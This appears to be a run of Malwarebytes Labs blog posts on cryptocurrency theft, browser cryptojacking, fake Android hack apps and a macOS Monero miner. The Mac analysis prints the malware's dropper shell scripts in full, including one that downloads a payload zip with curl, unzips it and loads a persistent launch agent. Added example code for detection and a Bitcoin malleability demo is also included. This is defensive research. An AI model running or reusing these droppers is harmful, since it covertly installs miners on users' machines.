Crime these days has gotten a technical upgrade. By going digital, crooks are better able to pull off high-stakes sting operations, using the anonymity of the Internet as their weapon of choice. And their target? Cryptocurrency.

Old-school bank robbers

The amount of money stolen from NiceHash is comparable to arguably the biggest physical heist to date, the theft of nearly $70 million from a Brazilian bank in 2005. Noted in the Guinness Book of World Records, the robbers managed to get away with 7,716 pounds of 50 Brazilian real notes. There were 25 people involved—including experts in mathematics, engineering, and excavation—who fronted a landscaping company near the bank, dug a 78-meter (256-foot) tunnel underneath it, and broke through 1 meter (about 3.5 feet) of steel-reinforced concrete to enter the bank vault.

The largest bank robbery in the United States, meanwhile, was at the United California Bank in 1972. The details of this bank robbery were described by its mastermind, Amil Dinsio, in the book Inside the Vault. A gang of seven, including an alarm expert, explosives expert, and burglary tool designer, broke into the bank’s safe deposit vault and made off with cash and valuables with an estimated value of $30 million US dollars.

What these robberies have in common is that, in order to pull them off, there were large groups of criminals involved with various special skills. Most of the criminals of these robberies were either caught or betrayed—physical theft leaves physical traces behind. Today’s physical robbers run the risk of getting hurt or hurting others, or leaving behind prints or DNA. And they are often tasked with moving large amounts of money or merchandise without being seen.

[Image: heavy loot]

Bank robbers 2.0

So here come the bank robbers 2.0. They don’t have to worry about transporting stolen goods, fleeing the crime scene, digging, or blowing things up. They are in no—immediate—physical danger. And if they’re smart enough, they work alone or remain anonymous, even to their accessories. Their digital thievery has proven successful through several methods used to obfuscate their identity, location, and criminal master plan.

Social engineering

One of the most spectacular digital crimes targeted 100 banks and financial institutions in 30 nations with a months-long prolonged attack in 2013, reportedly netting the criminals involved over $300 million. The group responsible for this used social engineering to install malicious programs on bank employees’ systems.

The robbers were looking for employees responsible for bank transfers or ATM remote control. By doing so, they were able to mimic the actions required to transfer money to accounts they controlled without alerting the bank that anything unusual was going on. For example, they were able to show more money on a balance than was actually in the account. An account with $10,000 could be altered to show $100,000 so that hackers could transfer $90,000 to their own accounts without anyone noticing anything.

The alleged group behind this attack, the Carbanak Group, has not yet been apprehended, and variants of its malware are still active in the wild.

Ponzi schemes

Bitcoin Savings & Trust (BST), a large Bitcoin investment firm that was later proved to be a pyramid scheme, offered 7 percent interest per week to investors who parked their Bitcoins there. When the virtual hedge fund shut down in 2012, most of its investors were not refunded. At the time of its closing, BST was sitting on 500,000 BTC, worth an estimated $5.6 million. Its founder, an e-currency banker who went by the pseudonym pirateat40, only paid back a small sum to some beneficiaries before going into default. It was later learned that he misappropriated nearly $150,000 of his clients’ money on “rent, car-related expenses, utilities, retail purchases, casinos, and meals.”

Hacking

Even though details are still unclear, the NiceHash hack was reported as a security breach related to the website of the popular mining marketplace. Roughly 4,732 coins were transferred away from internal NiceHash Bitcoin addresses to a single Bitcoin address controlled by an unknown party. The hackers appear to have entered the NiceHash system using the credentials of one of the company’s engineers. As it stands now, it is unknown how they acquired those, although it’s whispered to be an inside job.

Stolen wallet keys

In September 2011, the MtGox hot wallet private keys were stolen in a case of a simple copied wallet.dat file. This gave the hacker access to not only a sizable number of Bitcoins immediately, but also the ability to redirect the incoming trickle of Bitcoins deposited to any of the addresses contained in the file. This went on for a few years until the theft was discovered in 2014. The damages by then were estimated at $450 million. A suspect was arrested in 2017.

Transaction malleability

When a Bitcoin transaction is made, the account sending the money digitally signs the important information, including the amount of Bitcoin being sent, who it’s coming from, and where it’s going. A transaction ID, a unique name for that transaction, is then generated from that information. But some of the data used to generate the transaction ID comes from the unsigned, insecure part of the transaction. As a result, it’s possible to alter the transaction ID without needing the sender’s permission. This vulnerability in the Bitcoin protocol became known as “transaction malleability.”

Transaction malleability was a hot topic in 2014, as researchers saw how easily criminals could exploit it. For example, a thief could claim that his transactions didn’t show up under the expected ID (because he had edited it), and complain that the transaction had failed. The system would then automatically retry, initiating a second transaction and sending out more Bitcoins.
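A worked illustration of the mechanism, added here and not part of the original post: it serialises a legacy (pre-SegWit) Bitcoin transaction with constructed, zero-filled placeholder signature bytes, shows that the txid changes when a third party alters the scriptSig, and shows the defender-side check that matches payments by inputs and outputs rather than by txid.

```python
"""Transaction malleability on a legacy (pre-SegWit) Bitcoin transaction.

Added example, not from the Malwarebytes post. Serialisation follows the
legacy wire format; the signature and public key are zero-filled placeholders
(constructed), so nothing here can be broadcast. The point: the txid hashes
the whole serialisation including scriptSig, while the bytes a signature
commits to have scriptSig blanked, so scriptSig can change without
invalidating the signature.
"""
import hashlib
import struct


def sha256d(data: bytes) -> bytes:
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()


def varint(n: int) -> bytes:
    """Bitcoin CompactSize encoding."""
    if n < 0xFD:
        return bytes([n])
    if n <= 0xFFFF:
        return b"\xfd" + struct.pack("<H", n)
    if n <= 0xFFFFFFFF:
        return b"\xfe" + struct.pack("<I", n)
    return b"\xff" + struct.pack("<Q", n)


def push(data: bytes) -> bytes:
    """Direct push opcode for data shorter than 76 bytes."""
    assert len(data) < 0x4C
    return bytes([len(data)]) + data


def serialize(tx: dict, blank_scriptsig: bool = False) -> bytes:
    """Legacy serialisation. With blank_scriptsig=True every scriptSig is
    replaced by an empty script: a simplified view of what a signature covers
    (the real SIGHASH procedure substitutes the spent scriptPubKey there)."""
    out = struct.pack("<i", tx["version"]) + varint(len(tx["inputs"]))
    for prev_txid, index, script_sig, sequence in tx["inputs"]:
        script = b"" if blank_scriptsig else script_sig
        out += prev_txid + struct.pack("<I", index)
        out += varint(len(script)) + script + struct.pack("<I", sequence)
    out += varint(len(tx["outputs"]))
    for value, script_pubkey in tx["outputs"]:
        out += struct.pack("<q", value) + varint(len(script_pubkey)) + script_pubkey
    return out + struct.pack("<I", tx["locktime"])


def txid(tx: dict) -> str:
    """Display-order hex of the double-SHA256 over the full serialisation."""
    return sha256d(serialize(tx))[::-1].hex()


def same_payment(a: dict, b: dict) -> bool:
    """Defender-side check: two transactions are the same payment if they
    spend the same inputs to the same outputs, whatever their txids are."""
    return serialize(a, blank_scriptsig=True) == serialize(b, blank_scriptsig=True)


# Constructed placeholders: a fake DER signature plus SIGHASH_ALL byte and a
# fake compressed public key. A real wallet would produce real values.
FAKE_SIG = b"\x30" + bytes(70) + b"\x01"
FAKE_PUBKEY = b"\x02" + bytes(32)
PREV_TXID = bytes.fromhex("11" * 32)      # internal byte order, constructed
PAYEE_HASH160 = bytes.fromhex("ab" * 20)  # constructed

SCRIPT_SIG = push(FAKE_SIG) + push(FAKE_PUBKEY)
P2PKH = b"\x76\xa9\x14" + PAYEE_HASH160 + b"\x88\xac"

ORIGINAL = {
    "version": 1,
    "inputs": [(PREV_TXID, 0, SCRIPT_SIG, 0xFFFFFFFF)],
    "outputs": [(50_000_000, P2PKH)],  # 0.5 BTC in satoshis
    "locktime": 0,
}
# A third party's mutation: prepend OP_0 OP_DROP. The pushed signature and key
# are untouched; non-push operations in scriptSig are one of the malleability
# sources catalogued in BIP62.
MALLEATED = dict(ORIGINAL, inputs=[(PREV_TXID, 0, b"\x00\x75" + SCRIPT_SIG, 0xFFFFFFFF)])

if __name__ == "__main__":
    print("original  txid:", txid(ORIGINAL))
    print("malleated txid:", txid(MALLEATED))
    print("same payment:", same_payment(ORIGINAL, MALLEATED))
```

A service that retries a withdrawal because the expected txid never appeared is exactly the failure described above; keying the reconciliation on `same_payment` instead closes that gap.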

Silk Road 2.0 blamed this bug for the theft of $2.6 million in Bitcoins in 2014, but it was never proven to be true.

Man-in-the-middle (by design)

In 2018, a Tor proxy was found stealing Bitcoin from both ransomware authors and victims alike. A Tor proxy service is a website that allows users to access .onion domains hosted on the Tor network without having to install the Tor browser. As Tor proxy servers have a man-in-the-middle (MitM) function by design, the thieves were able to replace the Bitcoin address that victims were paying ransom to and insert their own. This left the ransomware authors unpaid, which in turn left the victims without their decryption key.

Cryptojacking

Also known as drive-by mining, cryptojacking is a next-generation, stealthy robbing trick that covers all mining activity performed on third-party systems without the users’ consent. Stealing small amounts from many can add up to large sums. There are so many methods to achieve this that Malwarebytes’ own Jérôme Segura published a whitepaper about it.

Unlike drive-by downloads that push malware, drive-by mining focuses on using the processing power of visitors’ computers to mine cryptocurrency, especially currencies designed to be mined on general-purpose processors. Miners of this kind arrive via advertisements, bundlers, browser extensions, and Trojans. The revenues are hard to guess, but given the number of blocks Malwarebytes records on Coinhive and similar sites daily, criminal profit margins could potentially be record-breaking.

Physical stealing of digital currency

This last one brings us full circle, as someone actually managed to steal Bitcoins the old-fashioned way. In January 2018, three armed men attempted to rob a Bitcoin exchange in Canada, but failed miserably as a hidden employee managed to call the police. However, others have had more success. The Manhattan District Attorney is looking for the accomplice of a man who robbed his friend of $1.8 million in Ether at gunpoint. Apparently this “friend” got hold of the physical wallet and forced the victim to surrender the key needed to transfer the cryptocurrency into his own account.

Summary

As we can conclude from the examples above, there are many ways for cybercriminals to get rich quick. With a lot less risk of physical harm and even less hard labor, they can score larger amounts for less risk than the old-fashioned bank robbers. The only pitfall to robbing digital currency is how to turn it into fiat money without raising a lot of suspicion or losing a big chunk to launderers.

While the diminished use of violence is reassuring, it’s still beneficial to think about how we can avoid becoming a victim. Much of it has to do with putting too much trust in the wrong people. We are dealing with a very young industry that doesn’t have a lot of established names. So how can you avoid getting hurt by these modern thieves? Here are a few tips:

  • Don’t put all your eggs in one basket.
  • Use common sense when deciding who to do business with. A little background check into the company and its execs never hurt anyone.
  • Don’t put more money into cryptocurrencies than you can spare.

Additional links

The post Bank robbers 2.0: digital thievery and stolen cryptocoins appeared first on Malwarebytes Labs.


Feb 8, 2018
John
Comments Off on New Deepfakes forum goes mining with Coinhive

New Deepfakes forum goes mining with Coinhive

You may or may not be familiar with the furore over Deepfakes, a relatively new development in pornography involving a tool called FacesApp, which is capable of producing a real porn clip that replaces the original actors’ heads with those of celebrities—or indeed, anyone at all.

Online fakes have been around since the early 2000s or possibly even earlier; alongside those old photos, fakers would also make the odd terrible porno flick. Those movies would quite literally be a static cut out of a celebrity’s head stuck onto the body. Some 20 years later, the tech has caught up, and the web is suddenly dealing with the fallout.

FacesApp allows people to “train” an AI to create a realistic head so the scene is practically indistinguishable from reality. The AI is trained by feeding it images or footage of people; the more data it has to go off, the more realistic everything is.

After a media firestorm, the inevitable has happened. All of the Deepfake subreddits, where the majority of content was being created, have been taken offline after major players such as Twitter and PornHub had already effectively banned Deepfake content from their networks.

The Deepfake tech is available for pretty much anyone to make use of—the only real barrier to entry is having a powerful PC capable of withstanding the intensive training process, which can take hours or days to complete.

Now, if you were a crafty cybercriminal and knew that the main Deepfakes sources were taken offline, with a sizable community of content consumers and creators with heavy-duty PC rigs suddenly set adrift, what would you do?

The answer, of course, is to monetize potentially dubious fakes that you didn’t create yourself and hammer visitors’ PCs with mining scripts.

One of the most popular “lifeboat” sites we’ve seen for those unceremoniously dumped from the tender embrace of reddit was being promoted pretty heavily on surviving subreddits:

[Image: promo messages]

On the surface, it looks like a fairly typical forum, and it’s been getting a fair bit of activity so far. It all looks legit—or at least as legit as can be given the controversial content on offer:

[Image: Deep...coins?]

A quick check of the source code, while your CPU likely ramps up to 100 percent, would tell a slightly different story:

[Image: miner code]

We have some Javascript located at:

/mybbalertsjs(dot)min(dot)js


Sure, you could try to make sense of it as is. Or, you could just unpack it instead and save yourself a headache because that is a large, confusing pile of code. What is it doing?

[Image: miner function]

var Miner=function

…miner…function? Did this site place mining scripts in the background?

[Image: coinhive]

self.CoinHive.CONFIG=

They sure did, and we block both the mining and the website in question.

[Image: blocked]

Coinhive is something we’ve been blocking since October. It allows you to place cryptocurrency mining scripts on your webpage, similar to how regular adverts are placed, except it’ll try to make as much use of your machine as possible to whip up some Monero coins for the site owner. Here’s an example of a site pushing a PC to the limit via mining scripts in the background. Check out the resources being gobbled up on the right-hand side:
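A small page-source scanner for the pattern described here, added as an example and not Malwarebytes’ own tooling: it walks the script tags of a fetched page, matches the two strings the post found in the unpacked script (“var Miner=function”, “self.CoinHive.CONFIG=”), the public coinhive.min.js loader, and the `new CoinHive.Anonymous('<site key>')` call from Coinhive’s documented API, and pulls out any site key. Both HTML documents are constructed; the site key in them is a made-up placeholder.

```python
"""Flag Coinhive-style browser miners in page source.

Added example, not Malwarebytes' code. Indicators: the two strings the post
shows in the unpacked script, the public coinhive.min.js loader name, and the
documented new CoinHive.Anonymous('<site key>') call. Site keys are 32
alphanumerics, the same shape as the keys in the post's IoC list.
"""
import re

MINER_INDICATORS = (
    "var Miner=function",
    "self.CoinHive.CONFIG=",
    "coinhive.min.js",
)
SCRIPT_TAG_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_RE = re.compile(r"""\bsrc\s*=\s*['"]([^'"]+)['"]""", re.I)
SITE_KEY_RE = re.compile(
    r"""CoinHive\.(?:Anonymous|User)\(\s*['"]([A-Za-z0-9]{32})['"]"""
)


def scan_script(text: str, where: str) -> list:
    """Return (indicator, location) pairs found in one script body or URL."""
    return [(ind, where) for ind in MINER_INDICATORS if ind in text]


def scan_html(html: str) -> dict:
    """Inspect every <script> tag: record external sources (to be fetched and
    passed to scan_script separately), inline indicators and site keys."""
    result = {"scripts": [], "indicators": [], "site_keys": []}
    for attrs, body in SCRIPT_TAG_RE.findall(html):
        match = SRC_RE.search(attrs)
        src = match.group(1) if match else None
        if src:
            result["scripts"].append(src)
            result["indicators"] += scan_script(src, src)
        result["indicators"] += scan_script(body, "<inline>")
        result["site_keys"] += SITE_KEY_RE.findall(body)
    return result


def is_mining(html: str) -> bool:
    found = scan_html(html)
    return bool(found["indicators"] or found["site_keys"])


# Constructed sample resembling the forum page: the external file name comes
# from the post, the inline miner block and site key are made up.
FORUM_PAGE = """<html><head><title>forum</title>
<script src="/mybbalertsjs.min.js"></script>
<script>
var Miner=function(e,t){this.key=e;this.threads=t};
self.CoinHive.CONFIG={LIB_URL:"https://coinhive.com/lib/",WEBSOCKET_SHARDS:[]};
new CoinHive.Anonymous('EXAMPLEKEY0123456789ABCDEFGHIJKL',{throttle:0.2}).start();
</script></head><body>threads</body></html>"""

# Constructed benign page for comparison.
CLEAN_PAGE = """<html><head><script src="/jquery.min.js"></script>
<script>var pageReady = true;</script></head><body>hello</body></html>"""

if __name__ == "__main__":
    print(scan_html(FORUM_PAGE))
    print("forum mining:", is_mining(FORUM_PAGE), "clean mining:", is_mining(CLEAN_PAGE))
```

External sources such as the mybbalertsjs file above are only listed, so the caller fetches them and runs `scan_script` on their contents; that is where the miner was hidden in this case.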

[Image: ramping up]

In an age of people leaving dozens of tabs open and going for dinner, websites running scripts that ramp you up to 100 percent CPU usage and generate a fair bit of heat in the bargain just aren’t my thing. Now that we have DIY fake porn tech which demands high system specs and has people simultaneously making content as well as downloading it, its users are prime targets for a spot of surreptitious cryptomining taking place behind the scenes.

We’ve seen a few mentions of other Deepfake aficionados complaining about dodgy sites, and we’ll be taking a closer look to see what’s out there. All in all, you’re probably better off steering clear of the whole mess and taking up a less stress-inducing hobby (for you and your computer).

Keep your security tools up to date, make informed decisions about what you want to block, and keep those CPU temperatures down to a minimum!

The post New Deepfakes forum goes mining with Coinhive appeared first on Malwarebytes Labs.


Feb 7, 2018
John
Comments Off on Bogus hack apps hack users back for cryptocash

Bogus hack apps hack users back for cryptocash

Recently, we discovered a gold…er…APK mine of fake hacking apps. The “legitimate” versions of hack apps are intended to hack other apps in order to get something for free. Although it’s unclear what exactly these fake apps claim to hack, the real hack job is done to unsuspecting users.

Search and you will find

Disclaimer:  I, and Malwarebytes, do not recommend the process I’m about to outline below. Be that as it may, I’m also not naïve and know people do this all the time. In order to demonstrate the pitfalls of such an approach, I’ll lay it all out for you.

Say you want a hack for a particular app. Obviously, you aren’t going to find such a hack on Google Play. So you fire up your favorite search engine and type in something like hack apk. In this example, let’s use Lyft hack apk—Lyft being, of course, the popular on-demand transportation company. There, right at the top of the results, is the link to the hack app you desire. You decide to play it safe and navigate to the source domain rather than the direct link to the hack app. It’s a clean but simple-looking website called androidapk.world.

Convinced that such a clean-looking site has to be legitimate, you proceed to the Lyft hack app.


Complete with app screenshots, description of the app (stolen from Google Play), a FAQ, and a How to Install section, it looks promising. There is even a long list of tags so it can be easily searched—which is how you navigated there in the first place. You roll the dice and click Download APK…

A bad roll of the dice

After install, you open the app and get a message that states you need to install one of three apps listed to unlock premium content.


At this point, I suspect that a seasoned user would conclude that the jig is up and rush to uninstall, but let’s just play this out anyway. The first link for Castle Clash redirects you to the legit Google Play version of the game—okay, easy enough. The second link for Final Fantasy XV redirects to a broken link—fail. The third and final link for AppMatch Survey redirects to a dreaded, but harmless survey that ends in, once again, installing an app from Google Play.

Besides the failed link, all the redirects equal a small payout to the evildoers if an app is installed. Thus the “run it for 30 seconds” disclaimer pop-up.

After installing said app, and still no hack app and/or premium content, you should be ready to uninstall this bogus hack job. Good luck finding the app’s shortcut icon though, because it doesn’t exist. Luckily, it’s not too hard to find in your apps list.

In reality, I’m a little disappointed and confused that the malware developers didn’t hide their efforts more thoroughly. But hey, it’s good news if you did unsuspectingly install it. Hopefully if you did install, you go through the steps to uninstall in lieu of the missing shortcut. However, there is going to be a small percentage that don’t bother and forget about its existence—which is exactly what the bad actors are “banking” on. (Pun intended. Wait for it…)

Oh, mine!

So far, the attempts to dupe users seem bush league. Meanwhile, the true malicious intent has been running in the background all along. During the entire process of clicking through redirect links, the user may notice their mobile device being a tad slow. That’s because a bitcoin miner has been running the whole time. Under the Java class com.coinhiveminer.CoinHive is a Monero JavaScript miner. Thus, we classify this bogus hack app as Android/Trojan.CoinMiner.kki.

Just a dish of adware

As if things couldn’t get worse, this fake hack app also comes with adware. Not surprising, as we are seeing a trend of adware being added to various malware variants as way to gain extra revenue. This particular adware serves ad pop-ups, as seen below.

Snake eyes

At the beginning of this blog post, I mentioned that I was not naïve to the fact that people willingly install hack apps. I ask you, dear readers, to not be naïve as well. Trying to find workarounds to get apps for free that are otherwise paid apps on Google Play is a gamble. The odds are against you by going to third-party app stores to install apps for free, or finding hack apps like the one described above. This roll of the dice ends in snake eyes.

In the scenario above, I’m not sure how anything is being hacked by the aforementioned Lyft Hack app. As a matter of fact, this should be the first clue that something is fishy. As with anything in life, use your best judgment when installing apps onto your mobile device. Installing an app from a shady app store, even if it does look legit, could cost you. Stay safe out there!

The post Bogus hack apps hack users back for cryptocash appeared first on Malwarebytes Labs.


Feb 7, 2018
John
Comments Off on New Mac cryptominer has 23 older variants

New Mac cryptominer has 23 older variants

On February 1, a new Mac cryptominer was discovered being distributed via a hack of the MacUpdate website. Since then, we’ve been doing some digging and found that this isolated incident was just the tip of the iceberg. The malware delivered by the MacUpdate hack appears to be the culmination of something that has been around since at least early October of last year.

As we usually do when looking into new malware, we did some searches through the website VirusTotal—a massive crowd-sourced malware repository—to see if we could find any other variants. These searches, called “retrohunts,” don’t always turn up much, but in this case we struck gold, finding no less than 23 older variants of this malware!

The oldest of these was a file named “niceass.zip” (nice name). Decompressing the file resulted in a folder with two files: an image file called “ass.jpg” and an apparently broken application named “temp.”

As indicated by the Finder, the “temp” application does not work at all, and on inspection, it didn’t even have the right internal structure to be a macOS app.

However, the contents are nonetheless intriguing. They are:

  • an “ass.jpg” image (which you’re really better off not seeing)
  • a file named “com.zerowidth.launched.apple.plist” which is a launch agent .plist file
  • an executable named “Dock” (the same name as the Apple process that manages the Dock)
  • a Frameworks folder containing some external framework code that must be needed by the Dock executable

Clearly, this isn’t an app, but some kind of naughtiness is planned.

What about the first ass.jpg file, located outside the temp.app bundle? In what I bet is not at all surprising to anyone, it turns out it’s not actually a JPEG file. Instead, it’s a shell script.

nohup mv ~/Downloads/niceass/temp.app ~/Downloads/niceass/.tmp
mv ~/Downloads/niceass/.tmp/Apple ~/Library &&
mkdir -p ~/Library/LaunchAgents &&
mv ~/Library/Apple/com.zerowidth.launched.apple.plist ~/Library/LaunchAgents &&
launchctl load -w ~/Library/LaunchAgents/com.zerowidth.launched.apple.plist &&
rm -rf ~/Downloads/niceass/.tmp &&
rm ~/Downloads/niceass/ass.jpg &&
mv ~/Library/Apple/ass.jpg ~/Downloads/niceass &&
open -a Preview ~/Downloads/niceass/ass.jpg &&
~/Library/Apple/Dock -user sarahmayergo1990@gmail.com@gmail.com -xmr &
killall Terminal

As we can see, this script assumes it will be run from within the niceass folder, which in turn must be in the Downloads folder. If it’s anywhere else, or if you removed the broken temp.app, the malware will fail completely.

The first step is to rename temp.app to “.tmp”, which hides it from view thanks to the initial period in the name. (I’m not sure why it wasn’t distributed with this name in the first place, which would have been far less suspicious.) Next, it moves the various components out of the niceass folder and into the desired locations. The launch agent .plist file is installed and loaded.

Next, the script cleans up a bit and replaces the ass.jpg file with the ass.jpg file from inside the Apple folder. That file is then opened in Preview (ow, my eyes!) to cover up the fact that what was opened wasn’t just an image file.

Finally, the malicious Dock process is launched, passing in what appears to be an erroneous email address as the username to log in to Minergate. Dock will then suck up as much CPU time as it can to mine the Monero cryptocurrency. Hold on tight as your MacBook Pro’s fans attempt to propel it into flight!

The interesting thing is how the ass.jpg runs. We’ve covered a number of tricks used by malware in the past to make a shell script look like another type of file, such as a space at the end to prevent the extension from actually being treated as an extension or the use of special non-ASCII lookalike characters in the extension. In this case, though, that’s an honest-to-goodness .jpg extension.

There’s actually a simple way to override this extension. Using the Get Info window (File -> Get Info in the Finder), you can change the application used to open a particular file.

Doing so saves this setting in special metadata associated with the file. If the file is then compressed into a zip file using a Mac, that metadata will be preserved in some special files added to the zip file, and it will be reconstructed on another Mac when decompressed. This metadata can be viewed from the command line using the “xattr -l” command.

$ xattr -l /Users/thomas/Desktop/link-to-download.txt 
com.apple.LaunchServices.OpenWith:
00000000 62 70 6C 69 73 74 30 30 D3 01 02 03 04 05 06 57 |bplist00.......W|
00000010 76 65 72 73 69 6F 6E 54 70 61 74 68 5F 10 10 62 |versionTpath_..b|
00000020 75 6E 64 6C 65 69 64 65 6E 74 69 66 69 65 72 10 |undleidentifier.|
00000030 00 5F 10 24 2F 41 70 70 6C 69 63 61 74 69 6F 6E |._.$/Application|
00000040 73 2F 55 74 69 6C 69 74 69 65 73 2F 54 65 72 6D |s/Utilities/Term|
00000050 69 6E 61 6C 2E 61 70 70 5F 10 12 63 6F 6D 2E 61 |inal.app_..com.a|
00000060 70 70 6C 65 2E 54 65 72 6D 69 6E 61 6C 08 0F 17 |pple.Terminal...|
00000070 1C 2F 31 58 00 00 00 00 00 00 01 01 00 00 00 00 |./1X............|
00000080 00 00 00 07 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000090 00 00 00 6D |...m|
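The OpenWith value above is a binary plist, so it can be decoded with the standard library. The check below is an added example, not Malwarebytes’ code: it parses the bytes from the `xattr -l` dump above with `plistlib` and applies a simple policy of its own, flagging any file with a data-type extension whose override hands it to Terminal (or another interpreter app, a list this example assumes).

```python
"""Decode a com.apple.LaunchServices.OpenWith override and judge it.

Added example, not Malwarebytes' code. The bytes are the binary plist from
the page's `xattr -l link-to-download.txt` output; the policy (a data-type
extension that opens in a terminal/interpreter app is suspicious) is this
example's own assumption.
"""
import os
import plistlib

# Hex copied from the page's xattr -l output; whitespace is ignored by fromhex.
OPENWITH_HEX = """
62 70 6C 69 73 74 30 30 D3 01 02 03 04 05 06 57
76 65 72 73 69 6F 6E 54 70 61 74 68 5F 10 10 62
75 6E 64 6C 65 69 64 65 6E 74 69 66 69 65 72 10
00 5F 10 24 2F 41 70 70 6C 69 63 61 74 69 6F 6E
73 2F 55 74 69 6C 69 74 69 65 73 2F 54 65 72 6D
69 6E 61 6C 2E 61 70 70 5F 10 12 63 6F 6D 2E 61
70 70 6C 65 2E 54 65 72 6D 69 6E 61 6C 08 0F 17
1C 2F 31 58 00 00 00 00 00 00 01 01 00 00 00 00
00 00 00 07 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 6D
"""
OPENWITH_RAW = bytes.fromhex(OPENWITH_HEX)

# Extensions that should open in a viewer or editor, never in a shell.
DATA_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".txt", ".pdf"}
# Bundle ids that execute their input. Terminal is the one the page shows;
# iTerm2 is added by this example.
INTERPRETER_BUNDLES = {"com.apple.Terminal", "com.googlecode.iterm2"}


def decode_openwith(raw: bytes) -> dict:
    """Parse the xattr value: a binary plist with version, path and
    bundleidentifier keys."""
    return plistlib.loads(raw)


def assess(filename: str, raw: bytes) -> tuple:
    """Return (bundle_id, suspicious). Suspicious means a data-type extension
    whose OpenWith override routes the file to an interpreter app."""
    info = decode_openwith(raw)
    bundle = info.get("bundleidentifier", "")
    ext = os.path.splitext(filename)[1].lower()
    return bundle, ext in DATA_EXTENSIONS and bundle in INTERPRETER_BUNDLES


if __name__ == "__main__":
    print(decode_openwith(OPENWITH_RAW))
    print(assess("link-to-download.txt", OPENWITH_RAW))
```

On a Mac the same bytes come from `xattr -px com.apple.LaunchServices.OpenWith <file>`, whose hex output can be fed straight into `bytes.fromhex`.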

All in all, this is not a highly sophisticated piece of malware. There are many points of failure and things that will cause suspicion, and these could have all been avoided easily. But hey, this is just the earliest variant. We’ve still got 22 others to look at!

It turns out that none of the other niceass variants are any more sophisticated. Chronologically, the next variant is called “serial.zip”, and it works similarly, except that the suspicious temp.app has been renamed .temp.app, hiding it from the user’s view. It replaces the nasty photo with a text file containing a serial number of some kind. Otherwise, it is mostly identical, even down to the same damaged email address passed to the miner.

Next came a long string of files claiming to be JPEGs taken from WhatsApp, having names like “WhatsApp Image 2017-12-23 at 13.31.15.jpeg.” These didn’t rely on the temp.app, instead downloading the payload from public.adobecc.com as we saw with the MacUpdate variants, and grabbing a decoy image from www.askideas.com.

nohup rm -rf ~/Downloads/WhatsApp Image 2017-12-23 at 13.31.15.jpeg &&
curl -o ~/Downloads/WhatsApp Image 2017-12-23 at 13.31.15.jpeg https://www.askideas.com/media/38/I-Killed-Black-Snake-Why-U-Not-Happy-Funny-Pet-Meme-Image-For-Whatsapp.jpg &&
open -a Preview ~/Downloads/WhatsApp Image 2017-12-23 at 13.31.15.jpeg &&
curl -o ~/Library/1.zip https://public.adobecc.com/files/1UFRTMCE4GD4DBFSPQVFGD2FYYVFFF?content_disposition=attachment &&
cd ~/Library &&
unzip ~/Library/1.zip &&
rm -rf ~/Library/1.zip &&
mkdir -p ~/Library/LaunchAgents &&
mv ~/Library/GoogleSoftwareUpdateAgent.plist ~/Library/LaunchAgents &&
launchctl load -w ~/Library/LaunchAgents/GoogleSoftwareUpdateAgent.plist &
killall Terminal

This variant also employs the MacOSupdate.plist and MacOS.plist launch agents as seen with the MacUpdate variants of the malware. These WhatsApp variants are dated between December 23 and January 26 (judging by the file metadata, not the filename).

The final variant, dated December 26, was a single file named link-to-download.txt, which had similarities with both the WhatsApp and serial/niceass variants.

Interestingly, these files are all cryptographically signed using two different Apple developer certificates. These certificates were issued to people named (or claiming to be named) Ramos Jaxson and Tiago Mateus. (Mr. Jaxson was also responsible for the signatures on the more recent MacUpdate variants.)

In an interesting development, reported first by Arnaud Abbati of SentinelOne, the hidden .DS_Store metadata file inside the more recent MacUpdate variants revealed Mr. Mateus’ full name to be Tiago Brandao Mateus.

This is a pretty specific name, but it remains to be seen whether this is his real name or if it’s a decoy. Since this malware is not terribly sophisticated, with some pretty dumb mistakes being made with it, my suspicion is that the hacker who created it had no idea that the .DS_Store file existed, much less that it would capture the username he was using on his computer.

Hopefully, the authorities can track down Mr. Mateus and suss out any involvement he may have had in the creation of this malware.

IOCs

Dropped files

~/Library/LaunchAgents/com.zerowidth.launched.apple.plist
~/Library/LaunchAgents/GoogleSoftwareUpdateAgent.plist
~/Library/LaunchAgents/MacOS.plist
~/Library/LaunchAgents/MacOSupdate.plist
~/Library/Apple/Dock
~/Library/mdworker/mdworker

Hashes


The post New Mac cryptominer has 23 older variants appeared first on Malwarebytes Labs.
